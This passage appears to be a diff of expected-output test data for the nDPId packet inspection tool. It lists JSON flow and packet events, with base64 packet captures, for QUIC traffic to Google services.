CdMmUa\/SxdZy7sKrylT5MXV9b5DrpfLxY20Ij14Lk6JWUcZoiy3j7yw\/ubYUYzuIFwHCLS1lok6SgHEGlrR8xjkxHY6vGzVbWVDiYYq6XgJZVyWx9Zr21JeGPGR+US5r1E4SSQfwwOWaQavhUq2zrf51HYEGZm8p9Jic3+SIN7YCHgoI4i\/tTXM\/YmMyB3h7wKOaf5t8OBGmgTLUm+k7i6hbT9r3Y7OmK2kRsbBa0dHYNr5d8T\/VGuiypPl4TtR89RXwIfmo1y65zMEsqRFLzkK6P2g287jebk7ShyfkPP1oD8ZNBDlbBORa2duW2pLxkyuhyWajEEIi5IZPiaUkWm07VY\/3CTB8jOxZ5+izKU77hZEJk0XVWc4uEb\/QQAq9sUOziToveEoxQ8lVzljsMp2uan81z84MDcopGEBneePiZuuVSoKKmRlgQlyZ2l\/7Ctf2AtaE8R8Msu4a8A0Bz498uXG67md1GQF+0zH2XGFwQZi645tPEtwFrQVnFbTEKZ8BXx7Nap4taxxtpDt5spf5pj+Cxj9r7SClNizeuJvypZINANHTovJYhzPRhqHIpBWwpQfA3PntHJITXnxC4WmNYJAZCKBpSBcum+oGhD\/2Un0c0TlEt\/thcPjAZzpaUDcVhWpBWCVkKgQSFLnQ\/+DBcsrUFMD+140pVgLHMyZ9SjqlyJryDXQYG97OhxHyQHBDtRUXSWiUupn5VQi6
HXycsWOMWUIstNHGKJXGdHz1DTnhQOAh42MqA2+rEX\/B24vMgaRhWIP3wZKncvN8OnaQB1uLmAogRZC7n6Oq2DPqNrKGHl266GYXia9wtsSy3dBXWQj5ABuS+XuL0dLpYt1yK3fxHMTM\/IAuOD+tETJOkfaID9ExjejoJQhKxG9A+2SEOwuBb0RuAAN64trhUk+RRj7+3dvdvvBaNmCF4ehH9m8kVXSuv99l731dIsTYFWF+01uzy3N0iDA4kBqgoPzkJX11gEEbpzeVX+FAdEn0TRFND5ubmH+ZdrnKSeLG87FfotS2"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516392616,"flow_last_seen":1621516392616,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516392616,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516392616,"flow_last_seen":1621516392616,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516392616,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"www.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1621516392665,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516392665,"pkt":"AAAAAAAAAAEAS1QMCABFAAViOJJAAH4R+waokEAFfgNdWcQwAbsFTnBMwP8AAB0IERdUk7u04\/YAAEU0zZjp5d5N6z\/WFA1lBa7twBKX0QRDGLtlGmrXu8OpTBord0+OkbPX1c+PKlW1HAveX2hl7a2SKNkWfqYq58RzhqPWQX8bJuDEK8QKFY4N+fXvuJQuur2+wvIp6htGMnZMaAbzhBA68UXq8yqU4hc2a+yvi8q4Gw7qqb2E+jQUTHk\/UukIin5b3rNaLV29NbBtWWNxlePTd93OZVj7QCJVLus2fJCorUUrEQ+2qk5TnhfU9vsdmwx6IB0A2V9iCFudvKs3BZw6vMH3IleWL4m28gaDZFP\/Ll1+v0Cc0\/AhFgLuXnl4qKwc\/obxKbmZlIGLki5S8VSZsLsbZ0SY1dkVvRGgIQxLaExGsBGDsaP+GndXysNiZEoeGRVchLs2DAR9qG5bMjgc7F5c5b\/ooLBc6LekgqqXf0tYcNX1Ifb+9wWk9X7iYP2Nohxdjnln1PhhyFwwH33ccWEqs7INdIHG0pL4nnPScbjfx7yu4Bl0u5Gtz4zNTt9QkKj5iXyOT5Src6TBHalY8bYLvFDVN278pDT5QBdyLWL7oEpNfadXlpZ10SwBin7ywrf65HMlq5bMAPMBrYBhN2FpXmFM7cNtjWb2z2poAa89ojyAupp57XE\/vGPoBwccHb\/t4KO0u9+7ez5lsvxmpIWlCrsPHpI1g4mfO0K2EWFNk3Anr5nH0wYDaUe5wOdCxEbFvRUdCRA01RtABZ5xVMjlvM8apoN8Kn4WqEVHqc5yj0PWs63tUuuePQgwXAECstJsxODvlCazmTdvKFbpo4qJajXrsQCBK6CwTnJEHkWh2mXvAGZwTHKUoMREShbDu\/ALsa3MRdWCNgGf\/BKvqu3kEuPwv1flG9yIxqvtgt\/nUgVhX3\/Ca1qAiaNjv7PRG81n2utVIxCfJg2zDgTLIG+9kYRojM88Z50VdViswbxeaODbKLE4IZe70itf5BYmC5dKaOzsc1ubxfFZvyC5VvBiBKSYWr5eTrbV\/NAAOEFnJYlB25Y\/wg5kPi5dO6dlYjozGtNWPP69zhjoPqpEPKFrsuOmeoUe4bZiVs6v7uB2yz2vl80ozUBKDNkWC2YHCMAf9HVBqE\/Mrt2IBeml6QzS3foYzW8wnBHIkRYVazQQAL0CkiDaOIBs23kvmXeGNY5QiT\/Km9NqiagmZpg1i\/Uv\/usaNSyltg40pMPgJzU+fBzo6AsEexyAOsD0pOIzojnBHkDyfX8A0JBzcIDRpV9jCxmP7HsW1JH
DjEKth33XOpXP4gDE6MpCcWx3aAQ25e\/Bbpo8NtEeXF+yfPpvkKflVU+1JItk4qF2JL18pe6Z67OwXqMeVLCHeCYdcqAj4sDp\/bAaRMI1tux95ugztq9AD9OCfXb7G9t26ZLM8YTPeASjTdA5CYfpVHz2sX+woEDbxgjEJDs3sZI2EbLnMd+FueWt5JCuzhqp3U5HyfeCPvU2mr2VjkVlXSb3047h4hytv8T4GBpas5I7NhJQapwTo5LfsKX7Mofqiz53K16cNDqT3ZnIMna\/K4y7sDYs2X9mNTMDSYNIa\/4FeLiBH8A9L+U+oFbNXmIyIVYmhmeDNmPteEfmJfyF4FJIw6CUlzL16NlD5ssHr4ol3Z79gMSJGLQS1wH+8WFBeMD0+KjhLFq\/QPvILGL9RPCnU5yLgqiEMFdnCJHT+ZurivJX+hoHYujvsctlp\/8PU5VIpt04NJgCfEENhOzbQEZU18nrANoFpuXZVXdkrNZsLZUOPV8zsYwed0ZzXePATCJOX6zTH2LfV9PIzmKH7BHP"} 02300{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1621516392762,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516392762,"pkt":"AAAAAAAAAAEAS1QMCABFAAViOJRAAH4R+wSokEAFfgNdWcQwAbsFTl1Yzf8AAB0IERdUk7u04\/YAAEU0eDSMkBqrJmW6EJydxfwYF72L5nA6GrUPS3rH7Z4vAyXuRcxweddOKkASX50YBAhvaLVxmGJ6U6qmlUaUw7wG8uSjq3TUIdXhWTeA+Z8ZzjqDFIfVneiA0t5M3mNujQZuBubvDwsegbm5eznV7L66suC6BXbOSCIHvH7evlKO6ATwg5tFxeLwg2dQBmNXzcLpzP1hzfGeMKtiH0JWitHqVA2mzm27Mqt1iHbI076Nsu\/4wMO\/W3XkBTDzfNpPgFnftIbYHoXizWVyohtZerA2ZvknSHAJeoqUBq7N0ufeG0vQIdU8hj48c7MRPCJCF9m695quzN39M4n681LXz0x+pX82b6l6TYZlG14513IC7J2U8oNEfwDSayIe8G0CHV1B3ACOgwK9t5t4KOGH7tv4L\/cA\/218vC9QHWHbroomZJmAC62kahwkvbYEjTzFd9QROuCb6woHQy+U88o9PpFuhfBgntQxEdQlqOWULrlZ6tbg2bSyiDxgnq2RrpAHjTxjl94pfsNUVIs9mK0OO8D5idshzlgmF6d17h7PFU6G9dorGkzm4NR6WUaKBOX+5gSFRrfk9rmnT3D53pwkp+KwVxARzjieguJXcogE0fhlCx+gKMRLvNXNYJlLzUoWsx6Y99ImuInElR30vXJvdA2zs2nyF4Izn+Sk2DvY+QdXvwE9gHT6M7D4sY5EHqjt6KAbClo9EWMzbzYhRdVBmotRbwUHzdWJoeafqSv6L3CKvUgJLKdu0YTajaVfkj41xch2Lohpe1p0RenuUsL7ERmQDgXPtrDNmvKz4XuAVEatNNYtceCXUr5rdb5Lay71T9qiuyJKgim3ApBGMzP2iOye5lAvL866w2TLUpfUcidNdjXakFFn9n65PMZ6mDXwIyth\/ETgBN7SyydimVKIk\/PkZC9Fg87f0vvO3grQHqUwD
XSy5C0ztCgLy4Kaj+w39\/+zMgQLtjVs+9MRI+QyX4wHcxEAAKsDRVUal8I1t8UL25IJOIq86\/r0xJiOkSj0kF7WH9JqnNGH8+vmx6wgfCGnSI8zF1hr5NX3GOJjLqQ1U62XnJ90MIMkAhzBGer\/LGGVrS6W8xwobLnDBjP+gY09SHeFhdhAl\/eHpQg0s5R6ajAOqzjxGrHwtQziogeGwNpLFYXeX26h2mya6EHocWd4AXToiALDaPovQ7BUR40eP1NntQAWvSeuXAg4pR4Cun5d7LBjxkusmb3mE9H1Q+SLPzSC3KFAluSJZPze6abbazoXFzylXQTpl4YShg+w\/ZLee65FD7UbMvlCi2YOhpxl2oSVCkcd6UcWVItAiI91tALf89089cLcaf13TmGVO37bo8M60FjQZbY7IUQWTfBByLdIUrlG2l85aPi6R0Gv7Zgs9S7k6DvvsM2+Y8RZPzNE2yDKa3XOIxMuhHqpwcS1UiV9F8HZiDY7KAlK19HCyzGhwULC70LPMz+Lwyapr7kCcK6\/8uWl5EcgoBoQiGvXwUqKPqHplF5+pV\/+G96yrYK2729Ao1kcgwcblSXl7srLyRzMa1+N8EdtZ9w4xIIwWcmnoBW6k1pdwgIl3c9AZMQGynRVyFRdZE1ZgfE8pfV4nasitaR0M3gCMYKiLDWmRQiwD21k3IMkRH9lJ2iOuPUh9+SgcoHk8JKhhw+kVCfqGf7CsS8YItVTzzB+AlHzKfn5wPUKuhNr\/8ITyM1jWriraMh4v+v0GwqJXfRoEInWjIVWUPSsW3pM3ZIVbZ1\/BRcboa3+lLOz2oGo30HhPaksnLSu"} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516401935,"flow_last_seen":1621516401935,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516401935,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1621516401935,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516401935,"pkt":"AAAAAAAAAAEAsa95CABFAAViOQpAAH4R46+okEAFH9vSYPT\/AbsFTrroxP8AAB0IsiNjxAytUVgAAEU0Rqh1oTS7oO8cafTa28fAea2TrPFqW\/nlAJ184K2vdoORXSVeVMo9P99lJizlhuQtwjqOuZDX79HEkhTLfn6mYDJm73BPHv24qL5kCOPeP9TVOodlyLNO8CXYBxsAfImX9sw\/xiXEYv4nPCZx7phxoORVmsG2TXdTVZpBuZ8d7NkT8sYUuZrYsCN0\/vodaBZ64dqsKu\/0ntZ5Z7umvCbm7mnmp1P5JPIv8e5JTwTetx99GUoYM3Lss9UBBF+N+ZQAlvbgchHFwLlztR3qBr4DSeiBRa\/QCa9pwK0wrcW1wd7wQAaeeQE+HUQqzk21mGA3Ni9eqhg0A8mBSXeo4q6Zbc1Qge7LZjkMnbzwWQRN86QRzXhr6ZqznhJsrs2gf+6K0tcETEYFPcH1LtJTTUs0yfQDuzNUGO8Ljn5FQDD1zpRSvh8s7V0XLbAMDnVaIpCgJ\/Wzfpib6V2K6uy3y\/tnIOG\/KewueYVtxjddYzCJF8gOJKnl9hkHLvDnXYvahVHmmsSXkZEDuqEbBU3dhSvWdcTWMI6EGZ1la\/dvApDNmcb5oVn\/GyXnv8p4\/EaQDcSPgEq7tqrMT4zz16ib8ts2HPUFH18kMT2Lkh0kzLngKGYmQr4ud1DxA0Xh2OTA094JKybionwnwYmG0hB+bs0+W3t+x24Ktmr3UI23QaXnYhGjWDsFVhEwqC9edY1GzRBOF4JKsc9W3v+2U\/SN1VrKcc+Bevpa1\/hwmOmIR9UqFFRGYZ8XqCMSHhBSXZ98GHc6Tp8dIXH3GFzyONX70YreOQv70uYLLo5G7B3vB2RKjJ7e8jXDVU+JXnIlEp+p7OvLVmWZJ6HiKz1yl5dXohIS933mpnocVqWJKEIp+M6mIafetUbr7l3ub98qfRhhtDelAeHRUPJsEnbTDiebfukKletmLj2M9uqS88Nv+AYjq94MlKBVGJG0hWh9iwuuwJZCZQrbtQK7QrfvlcDDCr5e3q0MYyc3hLW0S3LNDLCzhZJHuh94K3qh3XmLNI48az6btORNC5VVHVviSCJzpyJi4AAhwk+vZEFTRHuM1FcBw3q6LFjAesbh3fvCHe8qk7EVnRd8k1OJ5pwTXlX6oar7LdQggPhSRol48jQ1hU6ZrFWWYfQPGtgNuW+QSDJwzQMXWphfVZa\/bjTSTMzzJaPxFEO8blcgWgJvyIWIDvvNVBD98ZAL8CsMvDFroJxvSZYdKcm6nvRcebluRLF9YOtvGfZtjUr\/cgCzoc03HDo0sme\/lIVgz3C75OcoWQzVAwwXgD9xeikHRVTVmRinnMrGdKATgKfjaUaxEe\/4wD1DfVumT5F9SapTR39kz6hwpsA7x0UFBknturrO+L+akqX6pIKp3yDxwqp2YSrQtxrQM2HIA0adAIfRYKkhcslIAE1vsvC5gIwRdKcF99Ry4D6WcmQtmyNTEyfKPVZfHdkM52cWvBas+\/FFczuVKVquG0n
\/ExS78d7fjZpi2el681jYg7VOPeTHklXJ3AcX9vJRJlgZZPB6ZD\/pRbnoYkfAMjAtcvtRNTJbEv29pz2OQpvG9FDqKNggB4bJ4OOi9Yw0GTejnWMyT8AcCgKIWe5b\/j4tdp6cu+NFWIXuGtcykvaSvXLjzYQp51JSgMBZ\/5jwYYoRMQZPWnJD0NMzZbO\/PZqzoW54JcJfedD6PsbQwfEVZ9qO0uZe4XJyGo7xXMW9qheN5A485AGg930nGI0W4y9g06HYqEC6FZbTUGCQFaccVVPlPrwvI0zP0AD0MaiXvO5tGDdy"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516401935,"flow_last_seen":1621516401935,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516401935,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"lh4.googleusercontent.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516401935,"flow_last_seen":1621516401935,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516401935,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"31.219.210.96","src_port":62719,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"lh4.googleusercontent.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 02319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1621516402235,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516402235,"pkt":"AAAAAAAAAAEAsa95CABFAAViORdAAH8R4qKokEAFH9vSYPT\/AbsFThF\/xP8AAB0IsiNjxAytUVgAAEU0VlWdZoCCvojlDyfa5Yeon08C9NEt7N1hxHGcl7FpDE5Z3Q9X5dOjGppxQuVZ+atKIAVvgbCcQVIhusNpashx33gtd6EhS7ZbKLvO4fc3PTuNql6Czjwc6b46RvYtjQHiYIFYBl31X9KsUf7sMEKMhQUWKvfytWSeM45U5GBkmLvf17D8qsLlZCvoAeY6VEYDPspoPXzAUYzFOsd5enOX3RMYkXxLlblB5gix22C\/+sUNmj+ugdjQw4gu\/fkb\/+jonN8oHz6zQAE\/PJV90A06PszzVUFctBVjZ+j5Pwz9BjozUZUg\/GO5kFR0Af1qvNMmXh\/0QoCYJzAEaSM5LZn5V9IadKyhWiAGb8bAhV2XnJfQfmszIOGoMMvaWthG2XAg6x\/4\/kCr95Ae0+tDiO2FzVaWI0nLPloEgW0+kB\/0TGNzL\/+Vy4YFY4PXcSh85eAiYwO2DkbrwC03nysw9v0D2V7rEHgNEO6ioGGuKv6mypXkj4bSQLPMzAkTM2MsPkC+fXW3f0l+0+za4NKOaY89pjaqW7bgVrOTpwQh35a6XwDDTLsphXxpOh7dlW0BzLzs03vnjLkokDqzkTmNyVYHQO8+a6C3JeLEnZTxFmQiaQ\/1gRzZm7cpY8RY0zhtz+q3FIkzaFIF\/AjKzGOOu8+5nsDUVUSfBS+fHZOKMM2eOjApm\/tZzcNNW1fwyIXL8V76UchSVNHrOV\/Piqka9R1tk0T+z1Vj7bcbIKNxTymIgfuZHLa2ehhiJRTVxdu4QeBCbNLbQ4jG7byE2A+bFbGS9ipIAYjoC9DnqCMgvL8Cm1jbkt2kO1+bEwS4X5aZJPdFzz2GBsHA6OGk5nmPDDOrC2sdqH58ShIcD+ZsAFb5MukWegKexiZGTPy5BYnViMh9Y9GI1jxJu5njnFXaIQ8qVdUruJxMtud99K9OjWpL94NFcooWggckaFlC21iuud67L15UsBMt83hjPDeakhUa4qZ0kj0gWALzdK205K5Wfz4DWhthyqf9fEU0GZOnTCjN7AnpkGQn2Hlp4OnoxtlX5VmufNf\/lVgf2ZeVPKUxlrBcNx2HEOHT4sZ7wIF\/3lwFsTvQKcix65Wug2ejeP3G\/83G9Qzq7h9g+PnVu8KncBYgcDGbeJP1jGd5F\/P6eUEylVpUxF4tuws0zlFKw2bJb8x6Y+cBLwGKHVC0PIzIUIpEH69fnkOGqSdaY0lRMXb\/EEra3O5ioR+Lwg
LTB92diG8Q5e0s\/v92K3HdzYSQ8TlwUeQ+x9woWExu3b9kGovPv3+jFRaFsbNxKvTVSEfjQDcafUTKOb\/3tA7k+tucr5my+7aGjn+bHbFFsjfBLkQLeS3GRbQpzQHhNjNEkEbiyp731MXybRhTCm+Y1qLET9TlYhBtjM8a05Qog2XwlqEM8wi+y\/CzGxubwbN4IWOhgTc1yngE04OAmEFZfH\/4awrr4YU9tLSzhbY9S3EHvvjjZpSTP0GsdZ92WziUPVAuGPfXB9clRlvNZdmbyGKYmxwvtpU\/5Dl\/GHlToInQQEgn2cmkuIp5zl\/9SUAMeYZhTS4JmDwPt30EK+TXkoGbxB4QQxockp24t2DasNgEbms8\/JVTW0JUJN2vNzbFOqVhPBBqAfcGjPeup16sTpvDGGHGSO4mJvUva77\/RTW+jGu67NC3sq2HErt3plviATd1Ww\/aNLcM+QsfCyX3a3A\/690D7ucSmy3lf\/i05xvjR7bo\/jVQ7KGbD6vK9Qm2U\/cQbTyFQzcqzPZgkKzr+l1adiNiIM8S"} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516402235,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516402235,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516405234,"flow_last_seen":1621516405234,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516405234,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1621516405234,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516405234,"pkt":"AAAAAAAAAAEATej1CABFAAViOZ5AAH4Raq6okEAFwUSpZOPvAbsFTiT5x\/8AAB0IzUnHeeUSQdQAAEU03jPmRxAy9OYylQgB73DOlVrCptv7ErpnY22OTRmr4wpzgeK3KwkGuqc0xjcaspxGnr6AdaN2xcChMtA2Y7IUI6FXy98k3lvliYUdwlbegMDaM0s2kOCEH3Q5e1wd\/wXjWcr6N0oOzawFyp9hVXwI7Q0kOSYeJlKwoxbwIoGt7YBZmAiPcan7Bi5oQyWPAWydB90gyIdx0d8HsFpltVW32pTZeG6z2CP9KXzoqL1WsfRBKPQpLg6kv3oYavjTBDOfvbG3i544r1+YdmIOCTSwSyCmI9DGVk8MczSIbJC0RPe4X9d\/gCsVsymdal9TdwxBqTtK7tvHTjEjpE2Tf9zS8Q8Gc5XsubCb6PKWxtWdDuV+ITz8lHNBp53kMGc9znlCSGBJ+oNWkpzQI4G8VgjVItmF+Zywys9D14q0rl8JP2cQboFSCzBrnPL2a2zEjzaiN8\/C2LlW8weYHLtePs7UcOLWgLnvnVwptNummGBctwDMgBNNvBf2oQ2BT3akVv85DLHFo7Mik5zFKo8Hm+zpDV42cxV43jlo01t6MR7pOAu2JhmZ1+Gmh9i4DhIdmnuAVFChlq0EBq1oKQrR4fmUxA2rjS0OXNZUgpLHLlJHctUJX60aeAJebb5ddjnK1JqXBjlvfbOAxFBhwR585AVOc\/N64kRyneM8sM9R6sU9iPp3yIrQOhQ0fDG2w0PRRpVMOhUEH7zw11a2+aNeZLGXC\/6Y0wE1yXsUVHJVJWZCYd86aXC4954s3IHZMqezQRrL1APK0
Uj3+9FDgBevGUuM+k\/7d0zQnJ4rTTwqaISHNag4vkTDqKoEyOQwoaqyXKoPHPHUetc\/U1Vqj5HbYafoEp++uRVCALzeb9EokrzQzuCDkwwF8fL5EJSue04WpPsmcpNQzG8CgHMNpnU5AEbkeVy\/Tm60yzyRqb5aB2QQGaHn7nU734znkp6LBO+x8dI+\/uS4XkpdHKVM+kYZtiYdPByeui07cdpE8sH7XxtZdaodU1va3LT6DdZOGuWd3tIpMbwiom5ZO+c\/sxrsYNosVZXax\/HOCVpOj9VoxFKdAe7TnQA3BtohBLmAQi8Ky9PiOLlrtiEWSg9vuNLm8rQjNzi0+N0HK+xINajobf3jP8DLsPNa3nLBja1BI0rYBIU3yqIKQ8Dl32xsc063rGPnZ+4xKu9Myfb2s3u3GI3oGkrhwU\/1sQwXPwuGtN7SwiZALjqLgHgfC\/8El\/VnwzeViayYEnclukedsZZq1ZR3YWbmiKeCCwlk9jmv2WHZEh8jZQ02nH\/6uAirsc4PzXtVqbEdP3Uf\/51U+sQ2p6kyPgxPJ0dJiulfpzegAk1g9URlFtj1Prm9nXN52Avs85Ku6PnWn2K5Oit6t5szIh7CpXNXZ\/r7lQTCzx1x4hjw2bMC4\/V4zZV4WAYezFgThubuHBYUA88rT2uj7dCArSt2N45qbwc4Mgwud71EluROJDlek42tV+tCsyiaMJdhkWkSEEHDQPlPnH1ij3N1iW3QwoTcs+h7cVopFBb+GUTNIJl1Qk9qCEm5UYTfWF6aVd987Lzl3tTyv5D0h+cV+Wv94Y6Bu\/GmojJU611wdu67nR\/gcxGb0oSe62fODz9zWZV7kmDKM8ibcM\/HbDPHzMlg3XQsDk+2kA7o3GGvnoL0ABy\/WVJWStRZAa5xIrmxaZRdp8pG0k8n7D0+KdVj++U2WeulgSlFklaHDSc62eMMQsSdHdlV62KC3i0iGJUMvejrPxkl+j6oLKhMF1+skGbQ5aFITVGA"} -00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516405234,"flow_last_seen":1621516405234,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516405234,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; 